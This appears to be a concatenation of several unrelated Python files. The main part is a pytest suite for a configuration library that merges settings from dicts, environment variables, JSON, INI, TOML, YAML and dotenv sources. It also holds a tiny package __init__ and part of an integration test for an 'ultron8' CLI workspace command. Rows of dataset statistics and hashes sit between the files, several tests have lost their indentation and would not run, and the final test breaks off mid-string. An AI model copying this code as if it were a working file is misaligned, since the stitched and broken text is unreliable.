enabled = true

[clients]
data = [ [ "gamma", "delta",], [ 1, 2,],]
hosts = [ "alpha", "omega",]

[servers.alpha]
ip = "10.0.0.1"
dc = "eqdc10"

[servers.beta]
ip = "10.0.0.2"
dc = "eqdc10"
"""
    DICT_TOML = {
        "owner": {"name": "ABC"},
        "database": {
            "server": "192.168.1.1",
            "ports": [8001, 8001, 8002],
            "connection_max": 5000,
            "enabled": True,
        },
        "clients": {"data": [["gamma", "delta"], [1, 2]], "hosts": ["alpha", "omega"]},
        "servers": {
            "alpha": {"ip": "10.0.0.1", "dc": "eqdc10"},
            "beta": {"ip": "10.0.0.2", "dc": "eqdc10"},
        },
    }
INI = """
[section1]
key1 = True

[section2]
key1 = abc
key2 = def
key3 = 1.1

[section3]
key1 = 1
key2 = 0
"""
DICT_INI = {
    "section1.key1": "True",
    "section2.key1": "abc",
    "section2.key2": "def",
    "section2.key3": "1.1",
    "section3.key1": "1",
    "section3.key2": "0",
}

DOTENV = """
dotenv1 = abc
dotenv2 = 1.2
dotenv3 = xyz
"""
DICT_DOTENV = {
    "dotenv1": "abc",
    "dotenv2": "1.2",
    "dotenv3": "xyz",
}

PATH_DICT = {
    "sdf.dsfsfd": 1,
    "sdjf.wquwe": "sdfsd",
    "sdjf.wquwe43": None,
    "sdjf.wquwse43": True,
}

PREFIX = "CONFIG"
os.environ.update(
    (PREFIX + "__" + k.replace(".", "__").upper(), str(v)) for k, v in DICT1.items()
)
def test_load_env():  # type: ignore
    cfg = ConfigurationSet(
        config_from_dict(DICT2_1, lowercase_keys=True),
        config_from_dict(DICT2_2, lowercase_keys=True),
        config_from_env(prefix=PREFIX, lowercase_keys=True),
    )

    # from env
    assert cfg["a1.b1.c1"] == "1"
    assert cfg["a1.b1"].get_int("c1") == 1
    assert cfg["a1.b1"].as_dict() == {"c1": "1", "c2": "2", "c3": "3"}
    assert cfg["a1.b2"].as_dict() == {"c1": "a", "c2": "True", "c3": "1.1"}

    # from dict
    assert cfg["a2.b1.c1"] == "f"
    assert cfg["a2.b2"].as_dict() == {"c1": 10, "c2": "YWJjZGVmZ2g=", "c3": "abcdefgh"}
def test_fails():  # type: ignore
    cfg = ConfigurationSet(
        config_from_dict(DICT2_1, lowercase_keys=True),
        config_from_dict(DICT2_2, lowercase_keys=True),
        config_from_env(prefix=PREFIX, lowercase_keys=True),
    )

    with pytest.raises(KeyError, match="a1.b2.c3.d4"):
        assert cfg["a1.b2.c3.d4"] is Exception

    with pytest.raises(AttributeError, match="c4"):
        assert cfg.a1.b2.c4 is Exception

    with pytest.raises(ValueError, match="Expected a valid True or False expression."):
        assert cfg["a1.b2"].get_bool("c3") is Exception
def test_get():  # type: ignore
    cfg = ConfigurationSet(
        config_from_dict(DICT2_1, lowercase_keys=True),
        config_from_dict(DICT2_2, lowercase_keys=True),
        config_from_env(prefix=PREFIX, lowercase_keys=True),
    )

    assert cfg.get("a2.b2") == config_from_dict(
        {"c1": 10, "c2": "YWJjZGVmZ2g=", "c3": "abcdefgh"}
    )
    assert cfg.get("a2.b5", "1") == "1"
def test_get_dict():  # type: ignore
    cfg = ConfigurationSet(
        config_from_dict(DICT2_1, lowercase_keys=True),
        config_from_dict(DICT2_2, lowercase_keys=True),
        config_from_env(prefix=PREFIX, lowercase_keys=True),
    )

    a2 = {
        "b1.c1": "f",
        "b1.c2": False,
        "b1.c3": None,
        "b2.c1": 10,
        "b2.c2": "YWJjZGVmZ2g=",
        "b2.c3": "abcdefgh",
    }
    a2nested = {
        "b1": {"c1": "f", "c2": False, "c3": None},
        "b2": {"c1": 10, "c2": "YWJjZGVmZ2g=", "c3": "abcdefgh"},
    }

    assert cfg.get_dict("a2") == a2
    assert cfg.a2.as_dict() == a2
    assert dict(cfg.a2) == a2nested

    with cfg.dotted_iter():
        assert cfg.get_dict("a2") == a2
        assert cfg.a2.as_dict() == a2
        # note that this still returns the nested dict since the dotted iteration
        # impacts only the parent cfg, not cfg.a2
        assert dict(cfg.a2) == a2nested
        # to use dotted iteration for children, we need to explicitly set it
        with cfg.a2.dotted_iter() as cfg_a2:
            assert dict(cfg_a2) == a2

    with pytest.raises(KeyError):
        assert cfg.get_dict("a3") is Exception

    assert dict(cfg.a2) == dict(cfg.a2.items())
def test_get_dict_different_types():  # type: ignore
    cfg = ConfigurationSet(
        config_from_dict(DICT3_1, lowercase_keys=True),
        config_from_dict(DICT3_2, lowercase_keys=True),  # a2 is ignored here
        config_from_dict(DICT3_3, lowercase_keys=True),
    )

    a2 = {
        "b2.c1": 10,
        "b2.c2": "YWJjZGVmZ2g=",
        "b2.c3": "abcdefgh",
        "g2": 10,
        "w2": 123,
        "w3": "abc",
    }
    a2nested = {
        "b2": {"c1": 10, "c2": "YWJjZGVmZ2g=", "c3": "abcdefgh"},
        "g2": 10,
        "w2": 123,
        "w3": "abc",
    }

    assert cfg.get_dict("a2") == a2
    assert cfg.a2.as_dict() == a2
    assert dict(cfg.a2) == a2nested

    with cfg.dotted_iter():
        assert cfg.get_dict("a2") == a2
        assert cfg.a2.as_dict() == a2
        # note that this still returns the nested dict since the dotted iteration
        # impacts only the parent cfg, not cfg.a2
        assert dict(cfg.a2) == a2nested
        # to use dotted iteration for children, we need to explicitly set it
        with cfg.a2.dotted_iter() as cfg_a2:
            assert dict(cfg_a2) == a2

    with pytest.raises(TypeError):  # the first configuration overrides the type
        assert cfg.get_dict("z1") is Exception

    assert cfg.z1 == 100
def test_repr_and_str():  # type: ignore
    import sys

    path = os.path.join(os.path.dirname(__file__), "python_config.py")
    cfg = ConfigurationSet(
        config_from_dict(DICT2_1, lowercase_keys=True),
        config_from_dict(DICT2_2, lowercase_keys=True),
        config_from_env(prefix=PREFIX, lowercase_keys=True),
        config_from_python(path, prefix="CONFIG", lowercase_keys=True),
    )

    joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
    joined_dicts.update(DICT2_1)
    joined_dicts.update(DICT2_2)
    joined_dicts["sys.version"] = sys.hexversion

    assert hex(id(cfg)) in repr(cfg)
    assert (
        str(cfg)
        == "{'a1.b1.c1': '1', 'a1.b1.c2': '2', 'a1.b1.c3': '3', 'a1.b2.c1': 'a', 'a1.b2.c2': 'True', "
        "'a1.b2.c3': '1.1', 'a2.b1.c1': 'f', 'a2.b1.c2': False, 'a2.b1.c3': None, 'a2.b2.c1': 10, "
        "'a2.b2.c2': 'YWJjZGVmZ2g=', 'a2.b2.c3': 'abcdefgh', 'sys.version': "
        + str(sys.hexversion)
        + "}"
    )
def test_alternate_set_loader():  # type: ignore
    import sys

    path = os.path.join(os.path.dirname(__file__), "python_config.py")
    import tempfile

    with tempfile.TemporaryDirectory() as folder:
        create_path_from_config(folder, config_from_dict(PATH_DICT), remove_level=0)
        entries = [
            DICT2_1,  # assumes dict
            ("dict", DICT2_2),
            ("env", PREFIX),
            ("python", path, "CONFIG"),
            ("json", JSON),
            ("ini", INI),
            ("dotenv", DOTENV),
            ("path", folder, 0),
        ]
        if yaml:
            entries.append(("yaml", YAML))
        if toml:
            entries.append(("toml", TOML))
        cfg = config(*entries, lowercase_keys=True)

        joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
        joined_dicts.update(DICT2_1)
        joined_dicts.update(DICT2_2)
        joined_dicts.update(DICT3)
        joined_dicts.update(DICT_INI)
        joined_dicts.update(DICT_DOTENV)
        if yaml:
            joined_dicts.update(DICT_YAML)
        if toml:
            joined_dicts.update(DICT_TOML)
        joined_dicts.update((k, str(v)) for k, v in PATH_DICT.items())
        joined_dicts["sys.version"] = sys.hexversion

        assert (
            config_from_dict(joined_dicts, lowercase_keys=True).as_dict() == cfg.as_dict()
        )
        assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg
def test_alternate_set_loader_prefix():  # type: ignore
    import sys

    path = os.path.join(os.path.dirname(__file__), "python_config.py")
    import tempfile

    with tempfile.TemporaryDirectory() as folder:
        create_path_from_config(folder, config_from_dict(PATH_DICT), remove_level=0)
        cfg = config(
            DICT2_1,  # assumes dict
            ("dict", DICT2_2),
            ("env",),
            ("python", path),
            ("json", JSON),
            ("ini", INI),
            ("dotenv", DOTENV),
            ("path", folder, 0),
            prefix="CONFIG",
            lowercase_keys=True,
        )

        joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
        joined_dicts.update(DICT2_1)
        joined_dicts.update(DICT2_2)
        joined_dicts.update(DICT3)
        joined_dicts.update(DICT_INI)
        joined_dicts.update(DICT_DOTENV)
        joined_dicts.update((k, str(v)) for k, v in PATH_DICT.items())
        joined_dicts["sys.version"] = sys.hexversion

        assert (
            config_from_dict(joined_dicts, lowercase_keys=True).as_dict() == cfg.as_dict()
        )
        assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg
def test_alternate_set_loader_strings():  # type: ignore
    import sys

    path = str(os.path.join(os.path.dirname(__file__), "python_config.py"))
    import tempfile

    with tempfile.TemporaryDirectory() as folder, tempfile.NamedTemporaryFile(
        suffix=".json"
    ) as f1, tempfile.NamedTemporaryFile(
        suffix=".ini"
    ) as f2, tempfile.NamedTemporaryFile(
        suffix=".yaml"
    ) as f3, tempfile.NamedTemporaryFile(
        suffix=".toml"
    ) as f4, tempfile.NamedTemporaryFile(
        suffix=".env"
    ) as f5:
        # path
        subfolder = folder + "/sub"
        os.makedirs(subfolder)
        create_path_from_config(subfolder, config_from_dict(PATH_DICT), remove_level=1)
        # json
        f1.file.write(JSON.encode())
        f1.file.flush()
        # ini
        f2.file.write(INI.encode())
        f2.file.flush()
        # .env
        f5.file.write(DOTENV.encode())
        f5.file.flush()

        entries = [
            DICT2_1,  # dict
            DICT2_2,
            "env",
            path,  # python
            f1.name,  # json
            f2.name,  # ini
            f5.name,  # .env
            folder,  # path
        ]
        if yaml:
            f3.file.write(YAML.encode())
            f3.file.flush()
            entries.append(f3.name)  # yaml
        if toml:
            f4.file.write(TOML.encode())
            f4.file.flush()
            entries.append(f4.name)  # toml
        cfg = config(*entries, prefix="CONFIG", lowercase_keys=True)

        joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
        joined_dicts.update(DICT2_1)
        joined_dicts.update(DICT2_2)
        joined_dicts.update(DICT3)
        joined_dicts.update(DICT_INI)
        joined_dicts.update(DICT_DOTENV)
        if yaml:
            joined_dicts.update(DICT_YAML)
        if toml:
            joined_dicts.update(DICT_TOML)
        joined_dicts.update((k, str(v)) for k, v in PATH_DICT.items())
        joined_dicts["sys.version"] = sys.hexversion

        assert (
            config_from_dict(joined_dicts, lowercase_keys=True).as_dict() == cfg.as_dict()
        )
        assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg
def test_alternate_set_loader_strings_python_module():  # type: ignore
    import sys

    module = "tests.python_config"
    import tempfile

    with tempfile.TemporaryDirectory() as folder, tempfile.NamedTemporaryFile(
        suffix=".json"
    ) as f1, tempfile.NamedTemporaryFile(
        suffix=".ini"
    ) as f2, tempfile.NamedTemporaryFile(
        suffix=".yaml"
    ) as f3, tempfile.NamedTemporaryFile(
        suffix=".toml"
    ) as f4:
        # path
        subfolder = folder + "/sub"
        os.makedirs(subfolder)
        create_path_from_config(subfolder, config_from_dict(PATH_DICT), remove_level=1)
        # json
        f1.file.write(JSON.encode())
        f1.file.flush()
        # ini
        f2.file.write(INI.encode())
        f2.file.flush()

        entries = [
            DICT2_1,  # dict
            DICT2_2,
            "env",
            module,  # python
            f1.name,  # json
            f2.name,  # ini
            folder,  # path
        ]
        if yaml:
            f3.file.write(YAML.encode())
            f3.file.flush()
            entries.append(f3.name)  # yaml
        if toml:
            f4.file.write(TOML.encode())
            f4.file.flush()
            entries.append(f4.name)  # toml
        cfg = config(*entries, prefix="CONFIG", lowercase_keys=True)

        joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
        joined_dicts.update(DICT2_1)
        joined_dicts.update(DICT2_2)
        joined_dicts.update(DICT3)
        joined_dicts.update(DICT_INI)
        if yaml:
            joined_dicts.update(DICT_YAML)
        if toml:
            joined_dicts.update(DICT_TOML)
        joined_dicts.update((k, str(v)) for k, v in PATH_DICT.items())
        joined_dicts["sys.version"] = sys.hexversion

        assert (
            config_from_dict(joined_dicts, lowercase_keys=True).as_dict() == cfg.as_dict()
        )
        assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg
def test_alternate_set_loader_fails():  # type: ignore
    with pytest.raises(
        ValueError,
        match="configs should be a non-empty iterable of Configuration objects",
    ):
        assert config() is Exception
    with pytest.raises(ValueError):
        assert config(("no type", "")) is Exception
    with pytest.raises(ValueError):
        assert config("no type") is Exception
    with pytest.raises(ValueError):
        assert config([]) is Exception
    with pytest.raises(ValueError):
        assert config(("python",)) is Exception
def test_allow_missing_paths():  # type: ignore
    import os
    import tempfile

    with tempfile.TemporaryDirectory() as folder:
        with pytest.raises(FileNotFoundError):
            config(("path", os.path.join(folder, "sub")))
        with pytest.raises(FileNotFoundError):
            config(os.path.join(folder, "file.json"))
        with pytest.raises(FileNotFoundError):
            config(os.path.join(folder, "file.ini"))
        with pytest.raises(FileNotFoundError):
            config(os.path.join(folder, "file.env"))
        with pytest.raises(FileNotFoundError):
            config(os.path.join(folder, "module.py"))
        with pytest.raises(ModuleNotFoundError):
            config(("python", folder))
        if yaml:
            with pytest.raises(FileNotFoundError):
                config(os.path.join(folder, "file.yaml"))
        if toml:
            with pytest.raises(FileNotFoundError):
                config(os.path.join(folder, "file.toml"))

        entries = [
            "env",
            os.path.join(folder, "file.json"),
            os.path.join(folder, "file.ini"),
            os.path.join(folder, "file.env"),
            ("path", os.path.join(folder, "sub")),
            os.path.join(folder, "module.py"),
            ("python", folder),
        ]
        if yaml:
            entries.append(os.path.join(folder, "file.yaml"))
        if toml:
            entries.append(os.path.join(folder, "file.toml"))
        config(*entries, ignore_missing_paths=True)
def test_dict_methods_items():  # type: ignore
    cfg = ConfigurationSet(
        config_from_dict(DICT2_1, lowercase_keys=True),
        config_from_dict(DICT2_2, lowercase_keys=True),
        config_from_env(prefix=PREFIX, lowercase_keys=True),
    )

    assert dict(cfg.items()) == {
        "a1": {
            "b1.c1": "1",
            "b1.c2": "2",
            "b1.c3": "3",
            "b2.c1": "a",
            "b2.c2": "True",
            "b2.c3": "1.1",
        },
        "a2": {
            "b1.c1": "f",
            "b1.c2": False,
            "b1.c3": None,
            "b2.c1": 10,
            "b2.c2": "YWJjZGVmZ2g=",
            "b2.c3": "abcdefgh",
        },
    }

    with cfg.dotted_iter():
        assert dict(cfg.items()) == dict(
            [
                ("a2.b2.c2", "YWJjZGVmZ2g="),
                ("a1.b2.c2", "True"),
                ("a1.b2.c1", "a"),
                ("a1.b1.c2", "2"),
                ("a2.b2.c3", "abcdefgh"),
                ("a2.b1.c1", "f"),
                ("a1.b1.c3", "3"),
                ("a2.b1.c2", False),
                ("a2.b1.c3", None),
                ("a1.b1.c1", "1"),
                ("a2.b2.c1", 10),
                ("a1.b2.c3", "1.1"),
            ]
        )
def test_dict_methods_keys_values():  # type: ignore
    cfg = ConfigurationSet(
        config_from_dict(DICT2_1, lowercase_keys=True),
        config_from_dict(DICT2_2, lowercase_keys=True),
        config_from_env(prefix=PREFIX, lowercase_keys=True),
    )

    assert sorted(cfg.keys()) == [
        "a1",
        "a2",
    ]
    assert dict(zip(cfg.keys(), cfg.values())) == {
        "a1": {
            "b1.c1": "1",
            "b1.c2": "2",
            "b1.c3": "3",
            "b2.c1": "a",
            "b2.c2": "True",
            "b2.c3": "1.1",
        },
        "a2": {
            "b1.c1": "f",
            "b1.c2": False,
            "b1.c3": None,
            "b2.c1": 10,
            "b2.c2": "YWJjZGVmZ2g=",
            "b2.c3": "abcdefgh",
        },
    }

    with cfg.dotted_iter():
        assert sorted(cfg.keys()) == [
            "a1.b1.c1",
            "a1.b1.c2",
            "a1.b1.c3",
            "a1.b2.c1",
            "a1.b2.c2",
            "a1.b2.c3",
            "a2.b1.c1",
            "a2.b1.c2",
            "a2.b1.c3",
            "a2.b2.c1",
            "a2.b2.c2",
            "a2.b2.c3",
        ]
        assert dict(zip(cfg.keys(), cfg.values())) == cfg.as_dict()
def test_reload():  # type: ignore
    import sys

    path = str(os.path.join(os.path.dirname(__file__), "python_config.py"))
    import tempfile

    with tempfile.TemporaryDirectory() as folder, tempfile.NamedTemporaryFile(
        suffix=".json"
    ) as f1, tempfile.NamedTemporaryFile(
        suffix=".ini"
    ) as f2, tempfile.NamedTemporaryFile(
        suffix=".yaml"
    ) as f3, tempfile.NamedTemporaryFile(
        suffix=".toml"
    ) as f4, tempfile.NamedTemporaryFile(
        suffix=".env"
    ) as f5:
        # path
        subfolder = folder + "/sub"
        os.makedirs(subfolder)
        create_path_from_config(subfolder, config_from_dict(PATH_DICT), remove_level=1)
        # json
        f1.file.write(JSON.encode())
        f1.file.flush()
        # ini
        f2.file.write(INI.encode())
        f2.file.flush()
        # .env
        f5.file.write(DOTENV.encode())
        f5.file.flush()

        entries = [
            DICT2_1,  # dict
            DICT2_2,
            "env",
            path,  # python
            f1.name,  # json
            f2.name,  # ini
            f5.name,  # .env
            folder,  # path
        ]
        if yaml:
            f3.file.write(YAML.encode())
            f3.file.flush()
            entries.append(f3.name)  # yaml
        if toml:
            f4.file.write(TOML.encode())
            f4.file.flush()
            entries.append(f4.name)  # toml
        cfg = config(*entries, prefix="CONFIG", lowercase_keys=True)

        joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
        joined_dicts.update(DICT2_1)
        joined_dicts.update(DICT2_2)
        joined_dicts.update(DICT3)
        joined_dicts.update(DICT_INI)
        joined_dicts.update(DICT_DOTENV)
        if yaml:
            joined_dicts.update(DICT_YAML)
        if toml:
            joined_dicts.update(DICT_TOML)
        joined_dicts.update((k, str(v)) for k, v in PATH_DICT.items())
        joined_dicts["sys.version"] = sys.hexversion

        assert (
            config_from_dict(joined_dicts, lowercase_keys=True).as_dict()
            == cfg.as_dict()
        )
        assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg

        # rewrite the json file and reload
        f1.file.seek(0)
        f1.file.truncate(0)
        f1.file.write(JSON2.encode())
        f1.file.flush()

        cfg.reload()
        assert cfg["a3.b1.c1"] == "afsdf"
def test_configs():  # type: ignore
    # readable configs
    cfg = ConfigurationSet(
        config_from_dict(DICT2_1, lowercase_keys=True),
        config_from_dict(DICT2_2, lowercase_keys=True),
        config_from_env(prefix=PREFIX, lowercase_keys=True),
    )
    assert cfg.configs[0] == config_from_dict(DICT2_1, lowercase_keys=True)
    cfg.configs = cfg.configs[1:]
    assert cfg.configs[0] == config_from_dict(DICT2_2, lowercase_keys=True)

    # writable configs
    cfg = ConfigurationSet(
        config_from_dict(DICT2_1, lowercase_keys=True),
        config_from_dict(DICT2_2, lowercase_keys=True),
        config_from_env(prefix=PREFIX, lowercase_keys=True),
    )
    cfg.update({"abc": "xyz"})
    assert cfg.configs[0] == config_from_dict(DICT2_1, lowercase_keys=True)
    cfg.configs = cfg.configs[1:]
    assert cfg.configs[0] == config_from_dict(DICT2_2, lowercase_keys=True)
def test_separator(): # type: ignore
import sys
import tempfile
path = os.path.join(os.path.dirname(__file__), "python_config_2.py")
with tempfile.TemporaryDirectory() as folder:
create_path_from_config(folder, config_from_dict(PATH_DICT), remove_level=0)
entries = [
("env", PREFIX),
("python", path, "CONFIG", "__"),
]
cfg = config(*entries, lowercase_keys=True)
joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
joined_dicts.update(DICT2_1)
joined_dicts.update(DICT2_2)
joined_dicts["sys.version"] = sys.hexversion
assert (
config_from_dict(joined_dicts, lowercase_keys=True).as_dict() == cfg.as_dict()
)
assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg
def test_separator_override_default(): # type: ignore
import sys
import tempfile
path = os.path.join(os.path.dirname(__file__), "python_config.py")
with tempfile.TemporaryDirectory() as folder:
create_path_from_config(folder, config_from_dict(PATH_DICT), remove_level=0)
entries = [
("env", PREFIX, "__"),
("python", path, "CONFIG"),
]
cfg = config(*entries, separator="_", lowercase_keys=True)
joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
joined_dicts.update(DICT2_1)
joined_dicts.update(DICT2_2)
joined_dicts["sys.version"] = sys.hexversion
assert (
config_from_dict(joined_dicts, lowercase_keys=True).as_dict() == cfg.as_dict()
)
assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg
def test_same_as_configuration(): # type: ignore
cfg = config_from_dict(DICT2_1, lowercase_keys=True)
cfgset = ConfigurationSet(config_from_dict(DICT2_1, lowercase_keys=True))
assert cfg.get_dict("a2") == cfgset.get_dict("a2")
assert cfg.a2.as_dict() == cfgset.a2.as_dict()
assert dict(cfg.a2) == dict(cfgset.a2)
assert dict(cfg.a2) == dict(cfg.a2.items())
assert dict(cfgset.a2) == dict(cfgset.a2.items())
assert cfg.as_dict() == cfgset.as_dict()
assert dict(cfg) == dict(cfgset)
def test_merging_values(): # type: ignore
DICT5_1 = {"a5.b1.c2": 3}
DICT5_2 = {"a5.b1.c1": 1, "a5.b1.c2": 2}
cfg = ConfigurationSet(
config_from_dict(DICT5_1),
config_from_dict(DICT5_2),
)
assert cfg["a5.b1"] == {"c1": 1, "c2": 3}
assert cfg.a5.b1 == {"c1": 1, "c2": 3}
| 28.690205 | 102 | 0.562604 | 3,184 | 25,190 | 4.282349 | 0.079774 | 0.058893 | 0.072314 | 0.033443 | 0.824202 | 0.79956 | 0.773084 | 0.740887 | 0.710011 | 0.687495 | 0 | 0.050305 | 0.28424 | 25,190 | 877 | 103 | 28.722919 | 0.705935 | 0.037634 | 0 | 0.552342 | 0 | 0.004132 | 0.132556 | 0 | 0 | 0 | 0 | 0 | 0.096419 | 1 | 0.027548 | false | 0 | 0.034435 | 0 | 0.061983 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6af4521369cc692597fe497e499b50be6eaa2727 | 72 | py | Python | foundation/backend/views/controller/mixins/__init__.py | tbone255/foundation | ca76fdd9b5345fead2d200f829eb67ba77bc865e | [
"MIT"
] | null | null | null | foundation/backend/views/controller/mixins/__init__.py | tbone255/foundation | ca76fdd9b5345fead2d200f829eb67ba77bc865e | [
"MIT"
] | null | null | null | foundation/backend/views/controller/mixins/__init__.py | tbone255/foundation | ca76fdd9b5345fead2d200f829eb67ba77bc865e | [
"MIT"
] | null | null | null | from .pagination import *
from .search import *
from . import variables
| 18 | 25 | 0.763889 | 9 | 72 | 6.111111 | 0.555556 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 72 | 3 | 26 | 24 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ed124098e07e9d6a0c5058dbebb9d67f6b31b93a | 9,491 | py | Python | tests/commands/test_cmd_workspace.py | bossjones/ultron8 | 45db73d32542a844570d44bc83defa935e15803f | [
"Apache-2.0",
"MIT"
] | null | null | null | tests/commands/test_cmd_workspace.py | bossjones/ultron8 | 45db73d32542a844570d44bc83defa935e15803f | [
"Apache-2.0",
"MIT"
] | 43 | 2019-06-01T23:08:32.000Z | 2022-02-07T22:24:53.000Z | tests/commands/test_cmd_workspace.py | bossjones/ultron8 | 45db73d32542a844570d44bc83defa935e15803f | [
"Apache-2.0",
"MIT"
] | null | null | null | import os
import shutil
import sys
import click
from click.testing import CliRunner
from fastapi.encoders import jsonable_encoder
import pytest
from ultron8 import config
from ultron8.api.factories.users import _MakeRandomNormalUserFactory
from ultron8.cli import cli
from ultron8.client import UltronAPI
from ultron8.config import ConfigManager, do_get_flag, do_set_flag
from ultron8.config.manager import ConfigProxy, NullConfig
from ultron8.core.files import load_json_file
from ultron8.core.workspace import CliWorkspace, prep_default_config
from tests.conftest import fixtures_path
from tests.utils.filesystem import helper_write_yaml_to_disk
from tests.utils.utils import get_superuser_jwt_request
@pytest.mark.skipif(
sys.stdout.encoding not in ["UTF-8", "UTF8"],
reason="Need UTF-8 terminal (not {})".format(sys.stdout.encoding),
)
@pytest.mark.clionly
@pytest.mark.integration
class TestCliWorkspaceCmd:
def test_cli_workspace_no_args(self, request, monkeypatch) -> None:
# reset global config singleton
config._CONFIG = None
fixture_path = fixtures_path / "isolated_config_dir"
print(fixture_path)
runner = CliRunner()
with runner.isolated_filesystem() as isolated_dir:
# Populate filesystem folders
isolated_base_dir = isolated_dir
isolated_xdg_config_home_dir = os.path.join(isolated_dir, ".config")
isolated_ultron_config_dir = os.path.join(
isolated_xdg_config_home_dir, "ultron8"
)
isolated_ultron_config_path = os.path.join(
isolated_ultron_config_dir, "smart.yaml"
)
# create base dirs
os.makedirs(isolated_xdg_config_home_dir)
# request.cls.home = isolated_base_dir
# request.cls.xdg_config_home = isolated_xdg_config_home_dir
# request.cls.ultron_config_dir = isolated_ultron_config_dir
# request.cls.ultron_config_path = isolated_ultron_config_path
# monkeypatch env vars to trick integration tests into running only in isolated file system
monkeypatch.setenv("HOME", isolated_base_dir)
monkeypatch.setenv("XDG_CONFIG_HOME", isolated_xdg_config_home_dir)
monkeypatch.setenv("ULTRON8DIR", isolated_ultron_config_dir)
# Copy the project fixture into the isolated filesystem dir.
shutil.copytree(fixture_path, isolated_ultron_config_dir)
# Monkeypatch a helper method onto the runner to make running commands
# easier.
runner.run = lambda command: runner.invoke(cli, command.split())
# And another for checking the text output by the command.
runner.output_of = lambda command: runner.run(command).output
# Run click test client
result = runner.invoke(cli, ["workspace"])
# verify results
assert result.exit_code == 0
assert "Usage: cli workspace [OPTIONS] COMMAND [ARGS]..." in result.output
assert "Interact with workspace for ultron8." in result.output
assert "Options:" in result.output
assert "--help Show this message and exit." in result.output
assert "Commands:" in result.output
assert "info Info on workspace" in result.output
assert "tree Tree command for Workspace" in result.output
def test_cli_workspace_tree(self, request, monkeypatch) -> None:
# reset global config singleton
config._CONFIG = None
fixture_path = fixtures_path / "isolated_config_dir"
print(fixture_path)
runner = CliRunner()
with runner.isolated_filesystem() as isolated_dir:
# Populate filesystem folders
isolated_base_dir = isolated_dir
isolated_xdg_config_home_dir = os.path.join(isolated_dir, ".config")
isolated_ultron_config_dir = os.path.join(
isolated_xdg_config_home_dir, "ultron8"
)
isolated_ultron_config_path = os.path.join(
isolated_ultron_config_dir, "smart.yaml"
)
# create base dirs
os.makedirs(isolated_xdg_config_home_dir)
# request.cls.home = isolated_base_dir
# request.cls.xdg_config_home = isolated_xdg_config_home_dir
# request.cls.ultron_config_dir = isolated_ultron_config_dir
# request.cls.ultron_config_path = isolated_ultron_config_path
# monkeypatch env vars to trick integration tests into running only in isolated file system
monkeypatch.setenv("HOME", isolated_base_dir)
monkeypatch.setenv("XDG_CONFIG_HOME", isolated_xdg_config_home_dir)
monkeypatch.setenv("ULTRON8DIR", isolated_ultron_config_dir)
# Copy the project fixture into the isolated filesystem dir.
shutil.copytree(fixture_path, isolated_ultron_config_dir)
# Grab access token
r = get_superuser_jwt_request()
tokens = r.json()
a_token = tokens["access_token"]
example_data = """
clusters_path: clusters/
cache_path: cache/
workspace_path: workspace/
templates_path: templates/
flags:
debug: 0
verbose: 0
keep: 0
stderr: 0
repeat: 1
clusters:
instances:
local:
url: http://localhost:11267
token: '{}'
""".format(
a_token
)
# overwrite smart.yaml w/ config that has auth token in it.
helper_write_yaml_to_disk(example_data, isolated_ultron_config_path)
# Monkeypatch a helper method onto the runner to make running commands
# easier.
runner.run = lambda command: runner.invoke(cli, command.split())
# And another for checking the text output by the command.
runner.output_of = lambda command: runner.run(command).output
# Run click test client
result = runner.invoke(cli, ["--debug", "workspace", "tree"])
print(result)
# verify results
assert result.exit_code == 0
# TODO: Use the capture fixture and test that it looks like this
# + /Users/malcolm/.config/ultron8
# + clusters
# + libs
# + smart.yaml
# + templates
# + workspace
def test_cli_workspace_info(self, request, monkeypatch) -> None:
# reset global config singleton
config._CONFIG = None
fixture_path = fixtures_path / "isolated_config_dir"
print(fixture_path)
runner = CliRunner()
with runner.isolated_filesystem() as isolated_dir:
# Populate filesystem folders
isolated_base_dir = isolated_dir
isolated_xdg_config_home_dir = os.path.join(isolated_dir, ".config")
isolated_ultron_config_dir = os.path.join(
isolated_xdg_config_home_dir, "ultron8"
)
isolated_ultron_config_path = os.path.join(
isolated_ultron_config_dir, "smart.yaml"
)
# create base dirs
os.makedirs(isolated_xdg_config_home_dir)
# request.cls.home = isolated_base_dir
# request.cls.xdg_config_home = isolated_xdg_config_home_dir
# request.cls.ultron_config_dir = isolated_ultron_config_dir
# request.cls.ultron_config_path = isolated_ultron_config_path
# monkeypatch env vars to trick integration tests into running only in isolated file system
monkeypatch.setenv("HOME", isolated_base_dir)
monkeypatch.setenv("XDG_CONFIG_HOME", isolated_xdg_config_home_dir)
monkeypatch.setenv("ULTRON8DIR", isolated_ultron_config_dir)
# Copy the project fixture into the isolated filesystem dir.
shutil.copytree(fixture_path, isolated_ultron_config_dir)
# Grab access token
r = get_superuser_jwt_request()
tokens = r.json()
a_token = tokens["access_token"]
example_data = """
clusters_path: clusters/
cache_path: cache/
workspace_path: workspace/
templates_path: templates/
flags:
debug: 0
verbose: 0
keep: 0
stderr: 0
repeat: 1
clusters:
instances:
local:
url: http://localhost:11267
token: '{}'
